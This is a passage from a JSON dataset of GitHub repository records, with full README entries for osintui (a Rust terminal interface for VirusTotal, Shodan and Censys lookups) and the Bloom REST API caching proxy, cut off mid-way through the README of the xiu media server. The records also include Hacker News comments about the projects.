"hn_comments": "I might have an use for it since we will have to expand our Redis instances to clusters at work.I don't know a whole lot about Redis, so I'm struggling to understand what this is. Am I correct in saying that this is just the clustering mechanism? So I'd need to run Redis instances, and use this to cluster them? If so, would this work with KeyDB (would that even make sense)?How does it work ? Is it sharding different keys to different Redis instances ?The master/replica setup is interesting because we did something similar at Shopify, but I don't believe this is conventional for redis cluster. Can you expand on that a bit? eg: Looks like master/replica are together on a host, wouldn't you want them spread out?You are including proxies for clients and server? How do they compare to envoy? eg: Are you doing anything clever to handle failovers transparently for clients?Is the metadata storage just using redis?Like Tendis? https://github.com/Tencent/TendisTendis is a high-performance distributed storage system fully compatible with the Redis protocol.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wssheldon/osintui", "link": "https://github.com/wssheldon/osintui", "tags": ["osint", "rust", "shodan", "threatintel", "tui", "virustotal", "security", "analysis"], "stars": 663, "description": "\ud83e\udd80\ud83d\udd0e OSINT from your favorite services in a friendly terminal user interface - integrations for Virustotal, Shodan, and Censys", "lang": "Rust", "repo_lang": "", "readme": "
\n

osintui

\n

Open Source Intelligence Terminal User Interface

\n \n

\n \n \"contributors\"\n \n \n \"last\n \n \n \"stars\"\n \n \n \"open\n \n \n \"license\"\n \n

\n

\n Report Bug\n \u00b7 \n Request Feature\n

\n
\n
\n
\n \"screenshot\"\n
\n\n----\n\n## Integrations\n\n
\n
\n

\n \n \"shodan\"\n \n \n \"censys\"\n \n \n \"virustotal\"\n \n

\n
\n\n## Installation\n\nFirst, install [Rust](https://www.rust-lang.org/tools/install) (using the recommended rustup installation method) and then\n\n```\ncargo install osintui\n```\n\n## Configuration\n\nosintui expects a TOML configuration file stored at `~/.osintui/config/config.toml` that sets the necessary API tokens for each service. The configuration file will be created for you on first run if one was not found.\n\n```toml\n[keys]\nvirustotal = \"api_key\"\nshodan = \"api_key\"\ncensys_id = \"api_id\"\ncensys_secret = \"api_key\"\n```\n\n## Hotkeys\n\n| Key | Description |\n| ----------- | ----------- |\n| h | Home |\n| / | Input |\n| q | Back |\n| c | Censys |\n| s | Shodan |\n| v | Virustotal |\n| \u2192 | Move Right |\n| \u2190 | Move Left |\n| \u2191 | Move Up |\n| \u2193 | Move Down |\n\n## Credits\n\n\u2b50 **[spotify-tui](https://github.com/Rigellute/spotify-tui)**\n\nThe software architecture is almost entirely modeled after spotify-tui. The codebase was invaluable in learning how to cleanly manage complex TUI state and implement generic handling of TUI components.\n\n\u2b50 **[wtfis](https://github.com/pirxthepilot/wtfis)**\n\nI needed a good first project to learn rust and wtfis was the primary source of inspiration for osintui.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "valeriansaliou/bloom", "link": "https://github.com/valeriansaliou/bloom", "tags": ["rest", "cache", "dos", "ddos", "scale", "infrastructure", "performance", "http", "speed", "rust", "redis"], "stars": 662, "description": ":cherry_blossom: HTTP REST API caching middleware, to be used between load balancers and REST API workers.", "lang": "Rust", "repo_lang": "", "readme": "Bloom\n=====\n\n[![Test and Build](https://github.com/valeriansaliou/bloom/workflows/Test%20and%20Build/badge.svg?branch=master)](https://github.com/valeriansaliou/bloom/actions?query=workflow%3A%22Test+and+Build%22) [![Build and Release](https://github.com/valeriansaliou/bloom/workflows/Build%20and%20Release/badge.svg)](https://github.com/valeriansaliou/bloom/actions?query=workflow%3A%22Build+and+Release%22) [![dependency status](https://deps.rs/repo/github/valeriansaliou/bloom/status.svg)](https://deps.rs/repo/github/valeriansaliou/bloom) [![Buy Me A Coffee](https://img.shields.io/badge/buy%20me%20a%20coffee-donate-yellow.svg)](https://www.buymeacoffee.com/valeriansaliou)\n\n**Bloom is a REST API caching middleware, acting as a reverse proxy between your load balancers and your REST API workers.**\n\nIt is completely agnostic of your API implementation, and requires minimal changes to your existing API code to work.\n\nBloom relies on `redis`, [configured as a cache](https://github.com/valeriansaliou/bloom/blob/master/examples/config/redis.conf) to store cached data. It is built in Rust and focuses on stability, performance and low resource usage.\n\n**Important: Bloom works great if your API implements REST conventions. Your API needs to use HTTP read methods, namely `GET`, `HEAD`, `OPTIONS` solely as read methods (do not use HTTP GET parameters as a way to update data).**\n\n_Tested at Rust version: `rustc 1.62.0 (a8314ef7d 2022-06-27)`_\n\n**\ud83c\uddeb\ud83c\uddf7 Crafted in Brest, France.**\n\n**:newspaper: The Bloom project was initially announced in [a post on my personal journal](https://journal.valeriansaliou.name/announcing-bloom-a-rest-api-caching-middleware/).**\n\n![Bloom](https://valeriansaliou.github.io/bloom/images/bloom.jpg)\n\n## Who uses it?\n\n\n\n\n\n\n\n\n
Crisp
\n\n_\ud83d\udc4b You use Bloom and you want to be listed there? [Contact me](https://valeriansaliou.name/)._\n\n## Features\n\n* **The same Bloom server can be used for different API workers at once**, using HTTP header `Bloom-Request-Shard` (eg. Main API uses shard `0`, Search API uses shard `1`).\n* **Cache stored on buckets**, specified in your REST API responses using HTTP header `Bloom-Response-Buckets`.\n* **Cache clustered by authentication token**, no cache leak across users is possible, using the standard `Authorization` HTTP header.\n* **Cache can be expired directly from your REST API workers**, via a control channel.\n* **Configurable per-request caching strategy**, using `Bloom-Request-*` HTTP headers in the requests your Load Balancers forward to Bloom.\n * Specify caching shard for an API system with `Bloom-Request-Shard` (default shard is `0`, maximum value is `15`).\n* **Configurable per-response caching strategy**, using `Bloom-Response-*` HTTP headers in your API responses to Bloom.\n * Disable all cache for an API route with `Bloom-Response-Ignore` (with value `1`).\n * Specify caching buckets for an API route with `Bloom-Response-Buckets` (comma-separated if multiple buckets).\n * Specify caching TTL in seconds for an API route with `Bloom-Response-TTL` (other than default TTL, number in seconds).\n* **Serve `304 Not Modified` to non-modified route contents**, lowering bandwidth usage and speeding up requests to your users.\n\n## The Bloom Approach\n\nBloom can be hot-plugged to sit between your existing Load Balancers (eg. NGINX), and your API workers (eg. NodeJS). It has been initially built to reduce the workload and drastically reduce CPU usage in case of API traffic spike, or DOS / DDoS attacks.\n\nA simpler caching approach could have been to enable caching at the Load Balancer level for HTTP read methods (`GET`, `HEAD`, `OPTIONS`). Although simple as a solution, it would not work with a REST API. REST API serve dynamic content by nature, that rely heavily on Authorization headers. Also, any cache needs to be purged at some point, if the content in cache becomes stale due to data updates in some database.\n\nNGINX Lua scripts could do that job just fine, you say! Well, I firmly believe Load Balancers should be simple, and be based on configuration only, without scripting. As Load Balancers are the entry point to all your HTTP / WebSocket services, you'd want to avoid frequent deployments and custom code there, and handoff that caching complexity to a dedicated middleware component.\n\n## How does it work?\n\nBloom is installed on the same server as each of your API workers. As seen from your Load Balancers, there is a Bloom instance per API worker. This way, your Load Balancing setup (eg. Round-Robin with health checks) is not broken. Each Bloom instance can be set to be visible from its own LAN IP your Load Balancers can point to, and then those Bloom instances can point to your API worker listeners on the local loopback.\n\nBloom acts as a Reverse Proxy of its own, and caches read HTTP methods (`GET`, `HEAD`, `OPTIONS`), while directly proxying HTTP write methods (`POST`, `PATCH`, `PUT` and others). All Bloom instances share the same cache storage on a common `redis` instance available on the LAN.\n\nBloom is built in Rust for memory safety, code elegance and especially performance. Bloom can be compiled to native code for your server architecture.\n\nBloom has minimal static configuration, and relies on HTTP response headers served by your API workers to configure caching on a per-response basis. Those HTTP headers are intercepted by Bloom and not served to your Load Balancer responses. Those headers are formatted as `Bloom-Response-*`. Upon serving response to your Load Balancers, Bloom sets a cache status header, namely `Bloom-Status` which can be seen publicly in HTTP responses (either with value `HIT`, `MISS` or `DIRECT` \u2014 it helps debug your cache configuration).\n\n![Bloom Schema](https://valeriansaliou.github.io/bloom/docs/models/schema.png)\n\n## How to use it?\n\n### Installation\n\nBloom is built in Rust. To install it, either download a version from the [Bloom releases](https://github.com/valeriansaliou/bloom/releases) page, use `cargo install` or pull the source code from `master`.\n\n\ud83d\udc49 _Each release binary comes with an `.asc` signature file, which can be verified using [@valeriansaliou](https://github.com/valeriansaliou) GPG public key: [:key:valeriansaliou.gpg.pub.asc](https://valeriansaliou.name/files/keys/valeriansaliou.gpg.pub.asc)._\n\n**Install from source:**\n\nIf you pulled the source code from Git, you can build it using `cargo`:\n\n```bash\ncargo build --release\n```\n\nYou can find the built binaries in the `./target/release` directory.\n\n**Install from Cargo:**\n\nYou can install Bloom directly with `cargo install`:\n\n```bash\ncargo install bloom-server\n```\n\nEnsure that your `$PATH` is properly configured to source the Crates binaries, and then run Bloom using the `bloom` command.\n\n**Install from packages:**\n\nDebian & Ubuntu packages are also available. Refer to the _[How to install it on Debian & Ubuntu?](#how-to-install-it-on-debian--ubuntu)_ section.\n\n**Install from Docker Hub:**\n\nYou might find it convenient to run Bloom via Docker. You can find the pre-built Bloom image on Docker Hub as [valeriansaliou/bloom](https://hub.docker.com/r/valeriansaliou/bloom/).\n\nFirst, pull the `valeriansaliou/bloom` image:\n\n```bash\ndocker pull valeriansaliou/bloom:v1.31.0\n```\n\nThen, seed it a configuration file and run it (replace `/path/to/your/bloom/config.cfg` with the path to your configuration file):\n\n```bash\ndocker run -p 8080:8080 -p 8811:8811 -v /path/to/your/bloom/config.cfg:/etc/bloom.cfg valeriansaliou/bloom:v1.31.0\n```\n\nIn the configuration file, ensure that:\n\n* `server.inet` is set to `0.0.0.0:8080` (this lets Bloom be reached from outside the container)\n* `control.inet` is set to `0.0.0.0:8811` (this lets Bloom Control be reached from outside the container)\n\nBloom will be reachable from `http://localhost:8080`, and Bloom Control will be reachable from `tcp://localhost:8811`.\n\n### Configuration\n\nUse the sample [config.cfg](https://github.com/valeriansaliou/bloom/blob/master/config.cfg) configuration file and adjust it to your own environment.\n\nMake sure to properly configure the `[proxy]` section so that Bloom points to your API worker host and port.\n\n**Available configuration options are commented below, with allowed values:**\n\n**[server]**\n\n* `log_level` (type: _string_, allowed: `debug`, `info`, `warn`, `error`, default: `error`) \u2014 Verbosity of logging, set it to `error` in production\n* `inet` (type: _string_, allowed: IPv4 / IPv6 + port, default: `[::1]:8080`) \u2014 Host and TCP port the Bloom server should listen on\n\n**[control]**\n\n* `inet` (type: _string_, allowed: IPv4 / IPv6 + port, default: `[::1]:8811`) \u2014 Host and TCP port Bloom Control should listen on\n* `tcp_timeout` (type: _integer_, allowed: seconds, default: `300`) \u2014 Timeout of idle/dead client connections to Bloom Control\n\n**[proxy]**\n\n* `shard_default` (type: _integer_, allowed: `0` to `15`, default: `0`) \u2014 Default shard index to use when no shard is specified in proxied HTTP requests\n\n**[[proxy.shard]]**\n\n* `shard` (type: _integer_, allowed: `0` to `15`, default: `0`) \u2014 Shard index (routed using `Bloom-Request-Shard` in requests to Bloom)\n* `host` (type: _string_, allowed: hostname, IPv4, IPv6, default: `localhost`) \u2014 Target host to proxy to for this shard (ie. where the API listens)\n* `port` (type: _integer_, allowed: TCP port, default: `3000`) \u2014 Target TCP port to proxy to for this shard (ie. where the API listens)\n\n**[cache]**\n\n* `ttl_default` (type: _integer_, allowed: seconds, default: `600`) \u2014 Default cache TTL in seconds, when no `Bloom-Response-TTL` provided\n* `executor_pool` (type: _integer_, allowed: `0` to `(2^16)-1`, default: `16`) \u2014 Cache executor pool size (how many cache requests can execute at the same time)\n* `disable_read` (type: _boolean_, allowed: `true`, `false`, default: `false`) \u2014 Whether to disable cache reads (useful for testing)\n* `disable_write` (type: _boolean_, allowed: `true`, `false`, default: `false`) \u2014 Whether to disable cache writes (useful for testing)\n* `compress_body` (type: _boolean_, allowed: `true`, `false`, default: `true`) \u2014 Whether to compress body upon store (using Brotli; usually reduces body size by 40%)\n\n**[redis]**\n\n* `host` (type: _string_, allowed: hostname, IPv4, IPv6, default: `localhost`) \u2014 Target Redis host\n* `port` (type: _integer_, allowed: TCP port, default: `6379`) \u2014 Target Redis TCP port\n* `password` (type: _string_, allowed: password values, default: none) \u2014 Redis password (if no password, dont set this key)\n* `database` (type: _integer_, allowed: `0` to `255`, default: `0`) \u2014 Target Redis database\n* `pool_size` (type: _integer_, allowed: `0` to `(2^32)-1`, default: `80`) \u2014 Redis connection pool size (should be a bit higher than `cache.executor_pool`, as it is used by both Bloom proxy and Bloom Control)\n* `max_lifetime_seconds` (type: _integer_, allowed: seconds, default: `60`) \u2014 Maximum lifetime of a connection to Redis (you want it below 5 minutes, as this affects the reconnect delay to Redis if a connection breaks)\n* `idle_timeout_seconds` (type: _integer_, allowed: seconds, default: `600`) \u2014 Timeout of idle/dead pool connections to Redis\n* `connection_timeout_seconds` (type: _integer_, allowed: seconds, default: `1`) \u2014 Timeout in seconds to consider Redis dead and emit a `DIRECT` connection to API without using cache (keep this low, as when Redis is down it dictates how much time to wait before ignoring Redis response and proxying directly)\n* `max_key_size` (type: _integer_, allowed: bytes, default: `256000`) \u2014 Maximum data size in bytes to store in Redis for a key (safeguard to prevent very large responses to be cached)\n* `max_key_expiration` (type: _integer_, allowed: seconds, default: `2592000`) \u2014 Maximum TTL for a key cached in Redis (prevents erroneous `Bloom-Response-TTL` values)\n\n### Run Bloom\n\nBloom can be run as such:\n\n`./bloom -c /path/to/config.cfg`\n\n**Important: make sure to spin up a Bloom instance for each API worker running on your infrastructure. Bloom does not manage the Load Balancing logic itself, so you should have a Bloom instance per API worker instance and still rely on eg. NGINX for Load Balancing.**\n\n### Configure Load Balancers\n\nOnce Bloom is running and points to your API, you can configure your Load Balancers to point to Bloom IP and port (instead of your API IP and port as previously).\n\n#### NGINX instructions\n\n**\u27a1\ufe0f Configure your existing proxy ruleset**\n\nBloom requires the `Bloom-Request-Shard` HTTP header to be set by your Load Balancer upon proxying a client request to Bloom. This header tells Bloom which cache shard to use for storing data (this way, you can have a single Bloom instance for different API sub-systems listening on the same server).\n\n```\n# Your existing ruleset goes here\nproxy_pass http://(...)\n\n# Adds the 'Bloom-Request-Shard' header for Bloom\nproxy_set_header Bloom-Request-Shard 0;\n```\n\n**\u27a1\ufe0f Adjust your existing CORS rules (if used)**\n\nIf your API runs on a dedicated hostname (eg. `https://api.crisp.chat` for [Crisp](https://crisp.chat/en/)), do not forget to adjust your [CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) rules accordingly, so that API Web clients (ie. browsers) can leverage the [ETag](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ETag) header that gets added by Bloom. This will help speed up API read requests on slower networks. **_If you don't have existing CORS rules, you may not need them, so ignore this._**\n\n```\n# Merge those headers with your existing CORS rules\nadd_header 'Access-Control-Allow-Headers' 'If-Match, If-None-Match' always;\nadd_header 'Access-Control-Expose-Headers' 'Vary, ETag' always;\n```\n\n_Note that a shard number is an integer from 0 to 15 (8-bit unsigned number, capped to 16 shards)._\n\n**The response headers that get added by Bloom are:**\n\n* **ETag**: unique identifier for the response data being returned (enables browser caching); [see MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ETag).\n* **Vary**: tells other cache layers (eg. proxies) that the ETag field may vary on each request, so they need to revalidate it; [see MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Vary).\n\n**The request headers that get added by the browser, as a consequence of Bloom adding the request headers above are:**\n\n* **If-Match**: used by the client to match a given server ETag field (on write requests); [see MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/If-Match).\n* **If-None-Match**: used by the client to match a given server ETag field (on read requests); [see MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/If-None-Match).\n\n_Note that you need to add both new request and response headers to your CORS rules. If you forget either one, requests to your API may start to fail on certain browsers (eg. Chrome with `PATCH` requests)._\n\n### Configure Your API\n\nNow that Bloom is running in front of your API and serving requests on behalf of it; your API can instruct Bloom how to behave on a per-response basis.\n\nYour API can send private HTTP headers in responses to Bloom, that are used by Bloom and removed from the response that is served to the request client (the `Bloom-Response-*` HTTP headers).\n\n_Note that your API should not serve responses in a compressed format. Please disable any Gzip or Brotli middleware on your application server, as Bloom will not be able to decode compressed response bodies. Compression of dynamic content should be handled by the load balancer itself._\n\n**\u27a1\ufe0f Do not cache response:**\n\nTo tell Bloom not to cache a response, send the following HTTP header as part of the API response:\n\n`Bloom-Response-Ignore: 1`\n\nBy default, Bloom retains all responses that are safe to cache, as long as they match both:\n\n**1. Cacheable methods:**\n\n* `GET`\n* `HEAD`\n* `OPTIONS`\n\n**2. Cacheable status:**\n\n* `OK`\n* `Non-Authoritative Information`\n* `No Content`\n* `Reset Content`\n* `Partial Content`\n* `Multi-Status`\n* `Already Reported`\n* `Multiple Choices`\n* `Moved Permanently`\n* `Found`\n* `See Other`\n* `Permanent Redirect`\n* `Unauthorized`\n* `Payment Required`\n* `Forbidden`\n* `Not Found`\n* `Method Not Allowed`\n* `Gone`\n* `URI Too Long`\n* `Unsupported Media Type`\n* `Range Not Satisfiable`\n* `Expectation Failed`\n* `I'm A Teapot`\n* `Locked`\n* `Failed Dependency`\n* `Precondition Required`\n* `Request Header Fields Too Large`\n* `Not Implemented`\n* `Not Extended`\n\n_Refer to [the list of status codes on Wikipedia](https://en.wikipedia.org/wiki/List_of_HTTP_status_codes) if you want to find the matching status codes._\n\n**\u27a1\ufe0f Set an expiration time on response cache:**\n\nTo tell Bloom to use a certain expiration time on response cache (time after which the cache is invalidated and thus a new response is fetched upon client request), send the following HTTP header as part of the API response (here for a TTL of 60 seconds):\n\n`Bloom-Response-TTL: 60`\n\nBy default, Bloom sets a TTL of 600 seconds (10 minutes), though this can be configured from `config.cfg`.\n\n**\u27a1\ufe0f Tag a cached response (for Bloom Control cache purge):**\n\nIf you'd like to use Bloom Control to programatically purge cached responses (see _[Can cache be programatically expired?](#can-cache-be-programatically-expired)_), you will need to tag those responses when they get cached. You can tell Bloom to tag a cached response in 1 or more bucket, as such:\n\n`Bloom-Response-Buckets: user_id:10012, heavy_route:1203`\n\nThen, when you need to purge the tagged responses for user with identifier `10012`, you can call a Bloom Control cache purge on bucket `user_id:10012`. The flow is similar for bucket `heavy_route:1203`.\n\nBy default, a cached response has no tag, thus it cannot be purged via Bloom Control _as-is_.\n\n## How to install it on Debian & Ubuntu?\n\nBloom provides [pre-built packages](https://packagecloud.io/valeriansaliou/bloom) for Debian-based systems (Debian, Ubuntu, etc.).\n\n**Important: Bloom only provides Debian 10 64 bits packages for now (Debian Buster). You will still be able to use them on other Debian versions, as well as Ubuntu.**\n\n**1\ufe0f\u20e3 Add the Bloom APT repository (eg. for Debian Buster):**\n\n```bash\necho \"deb https://packagecloud.io/valeriansaliou/bloom/debian/ buster main\" > /etc/apt/sources.list.d/valeriansaliou_bloom.list\n```\n\n```bash\ncurl --silent -L https://packagecloud.io/valeriansaliou/bloom/gpgkey | apt-key add -\n```\n\n```bash\napt-get update\n```\n\n**2\ufe0f\u20e3 Install the Bloom package:**\n\n```bash\napt-get install bloom\n```\n\n**3\ufe0f\u20e3 Edit the pre-filled Bloom configuration file:**\n\n```bash\nnano /etc/bloom.cfg\n```\n\n**4\ufe0f\u20e3 Restart Bloom:**\n\n```\nservice bloom restart\n```\n\n## How fast & lightweight is it?\n\nBloom is built in Rust, which can be compiled to native code for your architecture. Rust, unlike eg. Golang, doesn't carry a GC (Garbage Collector), which is usually a bad thing for high-throughput / high-load production systems (as a GC halts all program instruction execution for an amount of time that depends on how many references are kept in memory).\n\nNote that some compromises have been made relative to how Bloom manages memory. Heap-allocated objects are heavily used for the sake of simplicify. ie. responses from your API workers are fully buffered in memory before they are served to the client; which has the benefit of draining data from your API workers as fast as your loopback / LAN goes, even if the requester client has a very slow bandwidth.\n\nIn production at [Crisp](https://crisp.chat/en/), we're running multiple Bloom instances (for each of our API worker). Each one handles ~250 HTTP RPS (Requests Per Second), as well as ~500 Bloom Control RPS (eg. cache purges). Each Bloom instance runs on a single 2016 Xeon vCPU paired with 512MB RAM. The kind of HTTP requests Bloom handles is balanced between reads (`GET`, `HEAD`, `OPTIONS`) and writes (`POST`, `PATCH`, `PUT` and others).\n\nWe get the following `htop` feedback on a server running Bloom at such load:\n\n![htop](https://valeriansaliou.github.io/bloom/images/htop.png)\n\n**As you can see, Bloom consumes only a fraction of the CPU time (less than 5%) for a small RAM footprint (~5% which is ~25MB)**. On such a small server, we can predict Bloom could scale to even higher rates (eg. 10k RPS) without putting too much pressure on the system (the underlying NodeJS API worker would be overheating first as it's much heavier than Bloom).\n\nIf you want Bloom to handle very high RPS, make sure to adjust the `cache.executor_pool` and the `redis.pool_size` options to higher values (which may limit your RPS if you have a few milliseconds of latency on your Redis link \u2014 as Redis connections are blocking).\n\n## How does it deal with authenticated routes?\n\nAuthenticated routes are usually used by REST API to return data that's private to the requester user. Bloom being a cache system, it is critical that no cache leak from an authenticated route occur. Bloom solves the issue easily by isolating cache in namespaces for requests that send an HTTP `Authorization` header. This is the default, secure behavior.\n\nIf a route is being requested without HTTP `Authorization` header (ie. the request is anonymous / public), whatever the HTTP response code, that response will be cached by Bloom.\n\nAs your HTTP `Authorization` header contains sensitive authentication data (ie. username and password), Bloom stores those values hashed in `redis` (using a cryptographic hash function). That way, a `redis` database leak on your side will not allow an attacker to recover authentication key pairs.\n\n## Can cache be programatically expired?\n\nYes. As your existing API workers perform the database updates on their end, they are already well aware of when data - _that might be cached by Bloom_ - gets stale. Therefore, Bloom provides an efficient way to tell it to expire cache for a given bucket. This system is called **Bloom Control**.\n\nBloom can be configured to listen on a TCP socket to expose a cache control interface. The default TCP port is 8811. Bloom implements a basic Command-ACK protocol.\n\nThis way, your API worker (or any other worker in your infrastructure) can either tell Bloom to:\n\n* **Expire cache for a given bucket.** Note that as a given bucket may contain variations of cache for different HTTP `Authorization` headers, bucket cache for all authentication tokens is purged at the same time when you purge cache for a bucket.\n* **Expire cache for a given HTTP `Authorization` header.** Useful if an user logs-out and revokes their authentication token.\n\n**\u27a1\ufe0f Available commands:**\n\n* `FLUSHB `: flush cache for given bucket namespace\n* `FLUSHA `: flush cache for given authorization\n* `SHARD `: select shard to use for connection\n* `PING`: ping server\n* `QUIT`: stop connection\n\n**\u2b07\ufe0f Control flow example:**\n\n```bash\ntelnet bloom.local 8811\nTrying ::1...\nConnected to bloom.local.\nEscape character is '^]'.\nCONNECTED \nHASHREQ hxHw4AXWSS\nHASHRES 753a5309\nSTARTED\nSHARD 1\nOK\nFLUSHB 2eb6c00c\nOK\nFLUSHA b44c6f8e\nOK\nPING\nPONG\nQUIT\nENDED quit\nConnection closed by foreign host.\n```\n\n**Notice: before any command can be issued, Bloom requires the client to validate its hasher function against the Bloom internal hasher (done with the `HASHREQ` and `HASHRES` exchange). FarmHash is used to hash keys, using the FarmHash.fingerprint32(), which computed results may vary between architectures. This way, most weird Bloom Control issues are prevented in advance.**\n\n**\ud83d\udce6 Bloom Control Libraries:**\n\n* **NodeJS**: **[node-bloom-control](https://www.npmjs.com/package/bloom-control)**\n\n\ud83d\udc49 Cannot find the library for your programming language? Build your own and be referenced here! ([contact me](https://valeriansaliou.name/))\n\n## :fire: Report A Vulnerability\n\nIf you find a vulnerability in Bloom, you are more than welcome to report it directly to [@valeriansaliou](https://github.com/valeriansaliou) by sending an encrypted email to [valerian@valeriansaliou.name](mailto:valerian@valeriansaliou.name). Do not report vulnerabilities in public GitHub issues, as they may be exploited by malicious people to target production servers running an unpatched Bloom instance.\n\n**:warning: You must encrypt your email using [@valeriansaliou](https://github.com/valeriansaliou) GPG public key: [:key:valeriansaliou.gpg.pub.asc](https://valeriansaliou.name/files/keys/valeriansaliou.gpg.pub.asc).**\n", "readme_type": "markdown", "hn_comments": "Reminds me of https://varnish-cache.org/Curious, if you already are running NGINX in front, why not just use proxy_cache?I read pretty far into the readme before I realized this doesn't somehow use bloom filters.What's the difference between this and varnish or nginx acting like a reverse proxy?How does it compare to Varnish ?I'm confused why varnish wouldn't work.The stated use case is to have the backend making API calls to the cache layer to invalidate (purge) certain routes when they've changed.You could absolutely do that with varnish.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "harlanc/xiu", "link": "https://github.com/harlanc/xiu", "tags": ["rtmp", "rust", "hls", "rtmp-server", "xiu", "media-server", "live", "cdn", "tokio", "live-streaming", "security", "relay", "m3u8", "ts", "h264", "aac", "cluster", "audio", "video", "http-flv"], "stars": 662, "description": "A simple, high performance and secure live media server in pure Rust (RTMP/HTTP-FLV/HLS/Relay).\ud83e\udd80", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n\n![XIU](https://img.shields.io/:XIU-blue.svg)[![crates.io](https://img.shields.io/crates/v/xiu.svg)](https://crates.io/crates/xiu)\n[![crates.io](https://img.shields.io/crates/d/xiu.svg)](https://crates.io/crates/xiu)\n![RTMP](https://img.shields.io/:RTMP-blue.svg)[![crates.io](https://img.shields.io/crates/v/rtmp.svg)](https://crates.io/crates/rtmp)\n[![crates.io](https://img.shields.io/crates/d/rtmp.svg)](https://crates.io/crates/rtmp)\n![HTTPFLV](https://img.shields.io/:HTTPFLV-blue.svg)[![crates.io](https://img.shields.io/crates/v/httpflv.svg)](https://crates.io/crates/httpflv)\n[![crates.io](https://img.shields.io/crates/d/httpflv.svg)](https://crates.io/crates/httpflv)\n![HLS](https://img.shields.io/:HLS-blue.svg)[![crates.io](https://img.shields.io/crates/v/hls.svg)](https://crates.io/crates/hls)\n[![crates.io](https://img.shields.io/crates/d/hls.svg)](https://crates.io/crates/hls)\n![FLV](https://img.shields.io/:FLV-blue.svg)[![crates.io](https://img.shields.io/crates/v/xflv.svg)](https://crates.io/crates/xflv)\n[![crates.io](https://img.shields.io/crates/d/xflv.svg)](https://crates.io/crates/xflv)\n![MPEGTS](https://img.shields.io/:MPEGTS-blue.svg)[![crates.io](https://img.shields.io/crates/v/xmpegts.svg)](https://crates.io/crates/xmpegts)\n[![crates.io](https://img.shields.io/crates/d/xmpegts.svg)](https://crates.io/crates/xmpegts)\n[![](https://app.travis-ci.com/harlanc/xiu.svg?branch=master)](https://app.travis-ci.com/github/harlanc/xiu)\n[![](https://img.shields.io/discord/894502149764034560?logo=discord)](https://discord.gg/gS5wBRtpcB)\n![wechat](https://img.shields.io/:\u5fae\u4fe1-harlancc-blue.svg)\n![qqgroup](https://img.shields.io/:QQ\u7fa4-24893069-blue.svg)\n\n\nXIU\u662f\u7528\u7eafRust\u5f00\u53d1\u7684\u4e00\u6b3e\u7b80\u5355\u548c\u5b89\u5168\u7684\u6d41\u5a92\u4f53\u670d\u52a1\u5668\uff0c\u76ee\u524d\u652f\u6301\u6d41\u884c\u7684\u4e09\u5927\u6d41\u5a92\u4f53\u534f\u8bae\u5305\u62ecRTMP/HLS/HTTPFLV\uff0c\u53ef\u4ee5\u5355\u70b9\u90e8\u7f72\uff0c\u4e5f\u53ef\u4ee5\u7528relay\u529f\u80fd\u6765\u90e8\u7f72\u96c6\u7fa4\u3002\n\n## \u529f\u80fd\n\n- [x] RTMP\n - [x] \u53d1\u5e03\u76f4\u64ad\u6d41\u548c\u64ad\u653e\u76f4\u64ad\u6d41\n - [x] \u8f6c\u53d1\uff1a\u9759\u6001\u8f6c\u63a8\u548c\u9759\u6001\u56de\u6e90\n- [x] HTTPFLV\n- [x] HLS\n- [ ] SRT\n\n## \u51c6\u5907\u5de5\u4f5c\n#### \u5b89\u88c5 Rust and Cargo\n\n\n[Document](https://doc.rust-lang.org/cargo/getting-started/installation.html)\n\n## \u5b89\u88c5\u548c\u8fd0\u884c\n\n\u6709\u4e24\u79cd\u65b9\u5f0f\u6765\u5b89\u88c5xiu\uff1a\n \n - \u76f4\u63a5\u7528cargo\u6765\u5b89\u88c5\n - \u6e90\u7801\u7f16\u8bd1\u5b89\u88c5\n\n\n### \u7528cargo\u547d\u4ee4\u5b89\u88c5\n\n\u6267\u884c\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u8f6cxiu:\n\n cargo install xiu\n \n\u6267\u884c\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u67e5\u770b\u5e2e\u52a9\u4fe1\u606f:\n\n xiu -h\n \n A secure and easy to use live media server, hope you love it!!!\n\n Usage: xiu [OPTIONS] <--config |--rtmp >\n\n Options:\n -c, --config Specify the xiu server configuration file path.\n -r, --rtmp Specify the RTMP listening port(e.g.:1935).\n -f, --httpflv Specify the HTTP-FLV listening port(e.g.:8080).\n -s, --hls Specify the HLS listening port(e.g.:8081).\n -l, --log Specify the log level. [possible values: trace, debug, info, warn, error, debug]\n -h, --help Print help\n -V, --version Print version\n \n### \u6e90\u7801\u7f16\u8bd1\u5b89\u88c5\n\n#### \u514b\u9686 Xiu\n\n git clone https://github.com/harlanc/xiu.git\n Checkout\u6700\u65b0\u53d1\u5e03\u7684\u7248\u672c\u4ee3\u7801\uff1a\n \n git checkout tags/ -b \n \n#### \u7f16\u8bd1\n\n cd ./xiu/application/xiu\n cargo build --release\n#### \u8fd0\u884c\n\n cd ./xiu/target/release\n ./xiu -h\n \n## CLI\n\n#### \u8bf4\u660e\n\n\u53ef\u4ee5\u4f7f\u7528\u914d\u7f6e\u6587\u4ef6\u6216\u8005\u5728\u547d\u4ee4\u884c\u5bf9\u670d\u52a1\u8fdb\u884c\u914d\u7f6e\u3002\u6bd4\u5982\uff1a\n\n##### \u901a\u8fc7\u914d\u7f6e\u6587\u4ef6\u8fdb\u884c\u914d\u7f6e\n\n xiu -c configuration_file_path\n\n##### \u901a\u8fc7\u547d\u4ee4\u884c\n\n xiu -r 1935 -f 8080 -s 8081 -l info\n\n\n#### \u914d\u7f6e\u6587\u4ef6\u8bf4\u660e\n\n##### RTMP\n [rtmp]\n enabled = true\n port = 1935\n\n # pull streams from other server node.\n [rtmp.pull]\n enabled = false\n address = \"192.168.0.1\"\n port = 1935\n\n # push streams to other server node.\n [[rtmp.push]]\n enabled = true\n address = \"localhost\"\n port = 1936\n [[rtmp.push]]\n enabled = true\n address = \"192.168.0.3\"\n port = 1935\n \n##### HTTPFLV\n\n [httpflv]\n # true 